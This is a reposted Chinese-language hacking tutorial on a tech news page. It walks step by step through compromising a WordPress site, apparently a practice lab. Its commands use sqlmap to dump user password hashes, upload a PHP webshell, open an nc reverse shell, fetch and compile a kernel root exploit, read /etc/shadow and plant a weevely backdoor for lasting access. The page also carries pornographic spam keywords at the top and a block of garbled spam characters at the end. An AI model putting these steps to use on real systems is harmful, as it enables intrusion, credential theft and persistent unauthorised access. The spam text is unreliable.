日B视频 亚洲,啪啪啪网站一区二区,91色情精品久久,日日噜狠狠色综合久,超碰人妻少妇97在线,999青青视频,亚洲一区二卡,让本一区二区视频,日韩网站推荐

0
  • 聊天消息
  • 系統(tǒng)消息
  • 評(píng)論與回復(fù)
登錄后你可以
  • 下載海量資料
  • 學(xué)習(xí)在線課程
  • 觀看技術(shù)視頻
  • 寫文章/發(fā)帖/加入社區(qū)
會(huì)員中心
創(chuàng)作中心

完善資料讓更多小伙伴認(rèn)識(shí)你,還能領(lǐng)取20積分哦,立即完善>

3天內(nèi)不再提示

黑客常用的入手思路和技術(shù)手法

Android編程精選 ? 來源:Android編程精選 ? 作者:Android編程精選 ? 2022-07-27 10:44 ? 次閱讀
加入交流群
微信小助手二維碼

掃碼添加小助手

加入工程師交流群

通過本文你將了解黑客常用的入手思路和技術(shù)手法,適合熱愛網(wǎng)絡(luò)信息安全的新手朋友了解學(xué)習(xí)。本文將從最開始的信息收集開始講述黑客是如何一步步的攻破你的網(wǎng)站和服務(wù)器的。閱讀本文你會(huì)學(xué)到以下內(nèi)容: 1.滲透測(cè)試前的簡(jiǎn)單信息收集。 2.sqlmap的使用 3.nmap的使用 4.nc反彈提權(quán) 5.linux系統(tǒng)的權(quán)限提升 6.backtrack 5中滲透測(cè)試工具nikto和w3af的使用等. 假設(shè)黑客要入侵的你的網(wǎng)站域名為:hack-test.com 讓我們用ping命令獲取網(wǎng)站服務(wù)器的IP地址 564710fa-0cd9-11ed-ba43-dac502259ad0.jpg ? 現(xiàn)在我們獲取了網(wǎng)站服務(wù)器的IP地址為:173.236.138.113 ? 尋找同一服務(wù)器上的其它網(wǎng)站,我們使用sameip.org. ? 5664df0e-0cd9-11ed-ba43-dac502259ad0.jpg ? 26 sites hosted on IP Address 173.236.138.113 ?

ID Domain Site Link
1 hijackthisforum.com hijackthisforum.com
2 sportforum.net sportforum.net
3 freeonlinesudoku.net freeonlinesudoku.net
4 cosplayhell.com cosplayhell.com
5 videogamenews.org videogamenews.org
6 gametour.com gametour.com
7 qualitypetsitting.net qualitypetsitting.net
8 brendanichols.com brendanichols.com
9 8ez.com 8ez.com
10 hack-test.com hack-test.com
11 kisax.com kisax.com
12 paisans.com paisans.com
13 mghz.com mghz.com
14 debateful.com debateful.com
15 jazzygoodtimes.com jazzygoodtimes.com
16 fruny.com fruny.com
17 vbum.com vbum.com
18 wuckie.com wuckie.com
19 force5inc.com force5inc.com
20 virushero.com virushero.com
21 twincitiesbusinesspeernetwork.com twincitiesbusinesspeernetwork.com
22 jennieko.com jennieko.com
23 davereedy.com davereedy.com
24 joygarrido.com joygarrido.com
25 prismapp.com prismapp.com
26 utiligolf.com utiligolf.com

173.236.138.113上有26個(gè)網(wǎng)站,很多黑客為了攻破你的網(wǎng)站可能會(huì)檢查同服務(wù)器上的其它網(wǎng)站,但是本次是以研究為目標(biāo),我們將拋開服務(wù)器上的其它網(wǎng)站,只針對(duì)你的網(wǎng)站來進(jìn)行入侵檢測(cè)。 我們需要關(guān)于你網(wǎng)站的以下信息: 1. DNS records (A, NS, TXT, MX and SOA) 2. Web Server Type (Apache, IIS, Tomcat) 3. Registrar (the company that owns your domain) 4. Your name, address, email and phone 5. Scripts that your site uses (php, asp, asp.net, jsp, cfm) 6. Your server OS (Unix,Linux,Windows,Solaris) 7. Your server open ports to internet (80, 443, 21, etc.) 讓我們開始找你網(wǎng)站的DNS記錄,我們用who.is來完成這一目標(biāo). 56858178-0cd9-11ed-ba43-dac502259ad0.jpg ? 我們發(fā)現(xiàn)你的DNS記錄如下 ? 5694affe-0cd9-11ed-ba43-dac502259ad0.jpg ? ?讓我們來確定web服務(wù)器的類型 ? 56a853ec-0cd9-11ed-ba43-dac502259ad0.jpg ? 發(fā)現(xiàn)你的Web服務(wù)器是apache,接下來確定它的版本. ? ?IP:?173.236.138.113 Website Status:?active Server Type: Apache Alexa Trend/Rank:??1 Month:3,213,968 3 Month: 2,161,753 Page Views per Visit:??1 Month: 2.0 3Month: 3.7 ? 接下來是時(shí)候?qū)ふ夷憔W(wǎng)站域名的注冊(cè)信息,你的電話、郵箱、地址等. ? 56babc26-0cd9-11ed-ba43-dac502259ad0.jpg ? 我們現(xiàn)在已經(jīng)獲取了你的網(wǎng)站域名的注冊(cè)信息,包括你的重要信息等. ? 我們可以通過backtrack5中的whatweb來獲取你的網(wǎng)站服務(wù)器操作系統(tǒng)類型和服務(wù)器的版本. ? 56da4eec-0cd9-11ed-ba43-dac502259ad0.png56f80b3a-0cd9-11ed-ba43-dac502259ad0.png ? 我們發(fā)現(xiàn)你的網(wǎng)站使用了著名的php整站程序wordpress,服務(wù)器的的系統(tǒng)類型為FedoraLinux,Web服務(wù)器版本Apache 2.2.15.繼續(xù)查看網(wǎng)站服務(wù)器開放的端口,用滲透測(cè)試工具nmap: ? 1-Find services that run on server(查看服務(wù)器上運(yùn)行的服務(wù)) ? 570b3a8e-0cd9-11ed-ba43-dac502259ad0.jpg ? 2-Find server OS(查看操作系統(tǒng)版本) ? 5729e0ce-0cd9-11ed-ba43-dac502259ad0.jpg ? 只有80端口是開放的,操作系統(tǒng)是Linux2.6.22(Fedora Core 6),現(xiàn)在我們已經(jīng)收集了所有關(guān)于你網(wǎng)站的重要信息,接下來開始掃描尋找漏洞,比如: ? Sql injection – Blind sql injection – LFI – RFI – XSS – CSRF等等. ? 我們將使用Nikto來收集漏洞信息: ? root@bt:/pentest/web/nikto# perlnikto.pl -h hack-test.com ? 574a97c4-0cd9-11ed-ba43-dac502259ad0.jpg ? 我們也會(huì)用到Backtrack 5 R1中的W3AF 工具: ? root@bt:/pentest/web/w3af#./w3af_gui ? 575f3b0c-0cd9-11ed-ba43-dac502259ad0.jpg ? 我們輸入要檢測(cè)的網(wǎng)站地址,選擇完整的安全審計(jì)選項(xiàng). ? 57719b26-0cd9-11ed-ba43-dac502259ad0.jpg ? 稍等一會(huì),你將會(huì)看到掃描結(jié)果. ? 57880e9c-0cd9-11ed-ba43-dac502259ad0.jpg ? ?發(fā)現(xiàn)你的網(wǎng)站存在sql注入漏洞、XSS漏洞、以及其它的漏洞.讓我們來探討SQL注入漏洞. ? http://hack-test.com/Hackademic_RTB1/?cat=d%27z%220 ? 我們通過工具發(fā)現(xiàn)這個(gè)URL存在SQL注入,我們通過Sqlmap來檢測(cè)這個(gè)url. ? Using sqlmap with –u url ? 57a40dc2-0cd9-11ed-ba43-dac502259ad0.png ? 過一會(huì)你會(huì)看到 ? 57b490de-0cd9-11ed-ba43-dac502259ad0.png ? 輸入N按回車鍵繼續(xù) ? 57d2e2b4-0cd9-11ed-ba43-dac502259ad0.jpg ? 我們發(fā)現(xiàn)你的網(wǎng)站存在mysql顯錯(cuò)注入,mysql數(shù)據(jù)庫(kù)版本是5.0. 我們通過加入?yún)?shù)”-dbs”來嘗試采集數(shù)據(jù)庫(kù)名. ? 57e7e38a-0cd9-11ed-ba43-dac502259ad0.png ? 57fe3a40-0cd9-11ed-ba43-dac502259ad0.png ? 發(fā)現(xiàn)三個(gè)數(shù)據(jù)庫(kù),接下來通過參數(shù)”-D wordpress -tables”來查看wordpress數(shù)據(jù)庫(kù)的所有表名 ? 580bb1fc-0cd9-11ed-ba43-dac502259ad0.png ? 582612ea-0cd9-11ed-ba43-dac502259ad0.jpg ? 通過參數(shù)“-T wp_users –columns ”來查看wp_users表中的字段. ? 583be868-0cd9-11ed-ba43-dac502259ad0.png ? 584ed6a8-0cd9-11ed-ba43-dac502259ad0.jpg ? 接下來猜解字段user_login和user_pass的值.用參數(shù)”-C user_login,user_pass–dump” ? 5861a9ea-0cd9-11ed-ba43-dac502259ad0.jpg ? 我們會(huì)發(fā)現(xiàn)用戶名和密碼hashes值. 我們需要通過以下在線破解網(wǎng)站來破解密碼hashes ? http://www.onlinehashcrack.com/free-hash-reverse.php ? 5879bfa8-0cd9-11ed-ba43-dac502259ad0.png 登陸wordpress的后臺(tái)wp-admin ? 嘗試上傳php webshell到服務(wù)器,以方便運(yùn)行一些linux命令.在插件頁(yè)面尋找任何可以編輯的插件.我們選擇Textile這款插件,編輯插入我們的php webshell,點(diǎn)擊更新文件,然后訪問我們的phpwebshell. ? 5889a814-0cd9-11ed-ba43-dac502259ad0.jpg58a26c46-0cd9-11ed-ba43-dac502259ad0.jpg ? Phpwebshell被解析了,我們可以控制你網(wǎng)站的文件,但是我們只希望獲得網(wǎng)站服務(wù)器的root權(quán)限,來入侵服務(wù)器上其它的網(wǎng)站。 ? 我們用NC來反彈一個(gè)shell,首先在我們的電腦上監(jiān)聽5555端口. ? 58b0851a-0cd9-11ed-ba43-dac502259ad0.png ? 然后在Php webshell上反向連接我們的電腦,輸入你的IP和端口5555. ? 58c6be0c-0cd9-11ed-ba43-dac502259ad0.jpg 點(diǎn)擊連接我們會(huì)看到 ? 58e26238-0cd9-11ed-ba43-dac502259ad0.png ? 接下來我們嘗試執(zhí)行一些命令:

id
uid=48(apache) gid=489(apache) groups=489(apache) (用來顯示用戶的id和組)
pwd
/var/www/html/Hackademic_RTB1/wp-content/plugins (顯示服務(wù)器上當(dāng)前的路徑)
uname -a
Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 72145 EST 2009 i686 i686 i386 GNU/Linux
(顯示內(nèi)核版本信息) 58f7fc42-0cd9-11ed-ba43-dac502259ad0.jpg ? 現(xiàn)在我們知道,服務(wù)器的內(nèi)核版本是2.6.31.5-127.fc12.1686,我們?cè)趀xploit-db.com中搜索此版本的相關(guān)漏洞.
在服務(wù)器上測(cè)試了很多exp之后,我們用以下的exp來提升權(quán)限. http://www.exploit-db.com/exploits/15285 我們?cè)趎c shell上執(zhí)行以下命令: wgethttp://www.exploit-db.com/exploits/15285 -o roro.c (下載exp到服務(wù)器并重命名為roro.c)
注:很多l(xiāng)inux內(nèi)核的exp都是C語(yǔ)言開發(fā)的,因此我們保存為.c擴(kuò)展名.
exp roro.c代碼如下:

#include#include#include#include#include#include#include#include#include#include#include#define RECVPORT 5555#define SENDPORT 6666int prep_sock(int port){int s, ret;struct sockaddr_in addr;s = socket(PF_RDS, SOCK_SEQPACKET, 0);if(s < 0){printf(“[*] Could not open socket.”);exit(-1);}memset(&addr, 0, sizeof(addr));
通過以上代碼我們發(fā)現(xiàn)該exp是C語(yǔ)言開發(fā)的,我們需要將它編譯成elf格式的,命令如下: gcc roro.c –ororo 接下來執(zhí)行編譯好的exp ./roro 5914aed2-0cd9-11ed-ba43-dac502259ad0.jpg ? 執(zhí)行完成之后我們輸入id命令
id
我們發(fā)現(xiàn)我們已經(jīng)是root權(quán)限了
uid=0(root) gid=0(root) 592c7152-0cd9-11ed-ba43-dac502259ad0.png ? 現(xiàn)在我們可以查看/etc/shadow文件
cat/etc/shadow 5944a060-0cd9-11ed-ba43-dac502259ad0.jpg ? 我們可以使用”john theripper”工具破解所有用戶的密碼.但是我們不會(huì)這樣做,我們需要在這個(gè)服務(wù)器上留下后門以方便我們?cè)谌魏螘r(shí)候訪問它. ? 我們用weevely制作一個(gè)php小馬上傳到服務(wù)器上. ? 1.weevely使用選項(xiàng)
root@bt:/pentest/backdoors/web/weevely#./main.py - 59623c38-0cd9-11ed-ba43-dac502259ad0.jpg ? 2.用weevely創(chuàng)建一個(gè)密碼為koko的php后門 ? root@bt:/pentest/backdoors/web/weevely#./main.py -g -o hax.php -p koko ? 596fae04-0cd9-11ed-ba43-dac502259ad0.jpg ? 接下來上傳到服務(wù)器之后來使用它
root@bt:/pentest/backdoors/web/weevely#./main.py -t -uhttp://hack-test.com/Hackademic_RTB1/wp-content/plugins/hax.php -pkoko 598135de-0cd9-11ed-ba43-dac502259ad0.jpg ? 測(cè)試我們的hax.php后門 ? 5993ec4c-0cd9-11ed-ba43-dac502259ad0.jpg
審核編輯:彭靜
聲明:本文內(nèi)容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點(diǎn)僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場(chǎng)。文章及其配圖僅供工程師學(xué)習(xí)之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問題,請(qǐng)聯(lián)系本站處理。 舉報(bào)投訴
  • 服務(wù)器
    +關(guān)注

    關(guān)注

    14

    文章

    10371

    瀏覽量

    91768
  • 黑客
    +關(guān)注

    關(guān)注

    3

    文章

    284

    瀏覽量

    23151
  • 網(wǎng)絡(luò)信息
    +關(guān)注

    關(guān)注

    0

    文章

    28

    瀏覽量

    10553

原文標(biāo)題:黑客是如何攻破一個(gè)網(wǎng)站的?

文章出處:【微信號(hào):AndroidPush,微信公眾號(hào):Android編程精選】歡迎添加關(guān)注!文章轉(zhuǎn)載請(qǐng)注明出處。

收藏 人收藏
加入交流群
微信小助手二維碼

掃碼添加小助手

加入工程師交流群

    評(píng)論

    相關(guān)推薦
    熱點(diǎn)推薦

    瀚博半導(dǎo)體宣布深度參與百度飛槳黑客松生態(tài)活動(dòng)

    近日,瀚博半導(dǎo)體正式宣布深度參與百度飛槳主辦的黑客松生態(tài)活動(dòng)。面向全球開發(fā)者開放旗下載天系列加速卡開發(fā)環(huán)境,支持部署百度文心ERNIE-4.5 系列開源模型與PP-OCRv4 文檔理解模型,打造
    的頭像 發(fā)表于 04-11 09:41 ?696次閱讀

    與熱AI者同行 | Talkweb House黑客松暨開源鴻蒙城市技術(shù)沙龍·長(zhǎng)沙站圓滿舉行!

    3月27日,由開源鴻蒙項(xiàng)目群管理委員會(huì)(PMC)、開源鴻蒙AIModelSIG、全國(guó)新一代自主安全計(jì)算系統(tǒng)行業(yè)產(chǎn)教融合共同體聯(lián)合主辦,拓維信息及旗下開鴻智谷承辦的“TalkwebHouse黑客松暨
    的頭像 發(fā)表于 03-30 18:11 ?295次閱讀
    與熱AI者同行 | Talkweb House<b class='flag-5'>黑客</b>松暨開源鴻蒙城市<b class='flag-5'>技術(shù)</b>沙龍·長(zhǎng)沙站圓滿舉行!

    與熱AI者同行 | Talkweb House黑客松暨開源鴻蒙城市技術(shù)沙龍·長(zhǎng)沙站圓滿舉行

    3月27日,由開源鴻蒙項(xiàng)目群管理委員會(huì)(PMC)、開源鴻蒙AIModelSIG、全國(guó)新一代自主安全計(jì)算系統(tǒng)行業(yè)產(chǎn)教融合共同體聯(lián)合主辦,拓維信息及旗下開鴻智谷承辦的“TalkwebHouse黑客松暨
    的頭像 發(fā)表于 03-30 18:08 ?290次閱讀
    與熱AI者同行 | Talkweb House<b class='flag-5'>黑客</b>松暨開源鴻蒙城市<b class='flag-5'>技術(shù)</b>沙龍·長(zhǎng)沙站圓滿舉行

    變頻器維修的思路及步驟

    變頻器維修的思路及步驟
    發(fā)表于 03-30 16:33 ?0次下載

    常用的電纜帶電檢測(cè)技術(shù)各自都有哪些優(yōu)勢(shì)?

    的發(fā)生。當(dāng)下現(xiàn)場(chǎng)常用技術(shù)有局部放電檢測(cè)、紅外測(cè)溫技術(shù)以及磁感應(yīng)檢測(cè)、電場(chǎng)感應(yīng)檢測(cè)等,通過與現(xiàn)場(chǎng)需求進(jìn)行匹配來選擇適應(yīng)的技術(shù),從而實(shí)現(xiàn)對(duì)電纜運(yùn)行的有效檢測(cè)。 局部放電檢測(cè),其原理是檢測(cè)
    的頭像 發(fā)表于 03-30 13:41 ?156次閱讀
    <b class='flag-5'>常用</b>的電纜帶電檢測(cè)<b class='flag-5'>技術(shù)</b>各自都有哪些優(yōu)勢(shì)?

    首屆中國(guó)NVIDIA DGX Spark黑客松大賽開啟報(bào)名

    倒計(jì)時(shí)啟動(dòng)!首屆中國(guó) NVIDIA DGX Spark 黑客松(Hackathon)將于 3 月 13 日 - 3 月 28 日正式開啟報(bào)名!本屆賽事以“算力破局、AI 落地”為核心導(dǎo)向,依托
    的頭像 發(fā)表于 03-14 16:39 ?2744次閱讀

    硅谷2026 AI + IoT 硬件黑客松圓滿落幕!涂鴉 T5AI-Board 系列點(diǎn)燃實(shí)體智能創(chuàng)新

    2026年1月,HackStormAI+IoTHackathon:MakersGathering(AI+物聯(lián)網(wǎng)硅谷黑客馬拉松:創(chuàng)客聚會(huì))在硅谷成功舉辦。涂鴉智能作為聯(lián)合主辦方與核心技術(shù)贊助商深度參與
    的頭像 發(fā)表于 01-15 19:05 ?865次閱讀
    硅谷2026 AI + IoT 硬件<b class='flag-5'>黑客</b>松圓滿落幕!涂鴉 T5AI-Board 系列點(diǎn)燃實(shí)體智能創(chuàng)新

    8種常用的CRC算法分享

    CRC 計(jì)算單元可按所選擇的算法和參數(shù)配置來生成數(shù)據(jù)流的 CRC 碼。有些應(yīng)用中,可利用 CRC 技術(shù)來驗(yàn)證數(shù)據(jù)的傳輸和存儲(chǔ)的完整性。 8 種常用的 CRC 算法,包括: CRC16_IBM
    發(fā)表于 11-13 07:25

    常用Web 實(shí)時(shí)通信技術(shù):原理+選型,一篇通關(guān)

    在 Web 開發(fā)中,實(shí)時(shí)通信技術(shù)的核心目標(biāo)是實(shí)現(xiàn)客戶端(Browser)與服務(wù)器之間低延遲、雙向 / 單向的動(dòng)態(tài)數(shù)據(jù)交互,而非傳統(tǒng) HTTP 的 “請(qǐng)求 - 響應(yīng)” 模式。以下是 Web 端最常用
    的頭像 發(fā)表于 10-27 17:19 ?1146次閱讀
    <b class='flag-5'>常用</b>Web 實(shí)時(shí)通信<b class='flag-5'>技術(shù)</b>:原理+選型,一篇通關(guān)

    具身智能家務(wù)機(jī)器人黑客松報(bào)名通道已開啟

    全球首創(chuàng)的家務(wù)機(jī)器人開發(fā)者黑客松,將聚焦家務(wù)機(jī)器人領(lǐng)域,圍繞 NVIDIA 的 AI 與機(jī)器人技術(shù)與 Hugging Face 的 LeRobot 開源平臺(tái),為開發(fā)者提供技術(shù)支撐與實(shí)踐機(jī)會(huì),將創(chuàng)新構(gòu)想轉(zhuǎn)變?yōu)槁涞貙?shí)踐。
    的頭像 發(fā)表于 09-04 11:29 ?1403次閱讀

    開關(guān)電源維修思路及常見故障

    開關(guān)電源的維修思路及常見故障處理是電子技術(shù)人員需要掌握的重要技能。以下是對(duì)開關(guān)電源維修思路及常見故障的詳細(xì)分析。 ? 一、開關(guān)電源維修思路 1. 斷電檢查: ? ? ● ?外觀檢查:打
    的頭像 發(fā)表于 08-03 07:38 ?3028次閱讀

    云原生環(huán)境里Nginx的故障排查思路

    本文聚焦于云原生環(huán)境下Nginx的故障排查思路。隨著云原生技術(shù)的廣泛應(yīng)用,Nginx作為常用的高性能Web服務(wù)器和反向代理服務(wù)器,在容器化和編排的環(huán)境中面臨著新的故障場(chǎng)景和挑戰(zhàn)。
    的頭像 發(fā)表于 06-17 13:53 ?1183次閱讀
    云原生環(huán)境里Nginx的故障排查<b class='flag-5'>思路</b>

    微孔霧化技術(shù)自動(dòng)掃頻追頻-集成芯片

    微孔霧化加濕器,也稱為超聲波霧化器或者微孔加濕器,常用作補(bǔ)水儀或者香氛機(jī),主要利用電子高頻(常用在105-130KHz)震蕩,通過陶瓷霧化片(換能片)的高頻諧振,將液態(tài)水分子在鋼網(wǎng)的孔隙處打散而產(chǎn)生
    發(fā)表于 05-28 11:23

    第三屆NVIDIA DPU黑客松開啟報(bào)名

    第三屆 NVIDIA DPU 中國(guó)虛擬黑客松(Hackathon)將于 6 月 28 日 - 6 月 30 日正式開啟!作為備受廣大開發(fā)者期待的年度賽事,它將提供與 NVIDIA 加速網(wǎng)絡(luò)技術(shù)深度
    的頭像 發(fā)表于 05-27 10:16 ?1028次閱讀

    Linux黑客入侵檢測(cè)的排查思路

    檢查是否有UID和GID是0的賬號(hào) UID為0代表具有root權(quán)限。
    的頭像 發(fā)表于 05-23 15:13 ?699次閱讀
    Linux<b class='flag-5'>黑客</b>入侵檢測(cè)的排查<b class='flag-5'>思路</b>
    灵台县| 佛山市| 慈利县| 邳州市| 阿尔山市| 长乐市| 平昌县| 古蔺县| 北海市| 富蕴县| 武夷山市| 太和县| 青阳县| 开原市| 徐汇区| 新巴尔虎右旗| 通化市| 淄博市| 和政县| 仁布县| 大港区| 屯留县| 高阳县| 玉林市| 三穗县| 昭平县| 咸丰县| 岐山县| 旺苍县| 绩溪县| 天镇县| 巴彦县| 东至县| 阳信县| 德化县| 湄潭县| 甘洛县| 连州市| 武胜县| 榆林市| 乌兰察布市|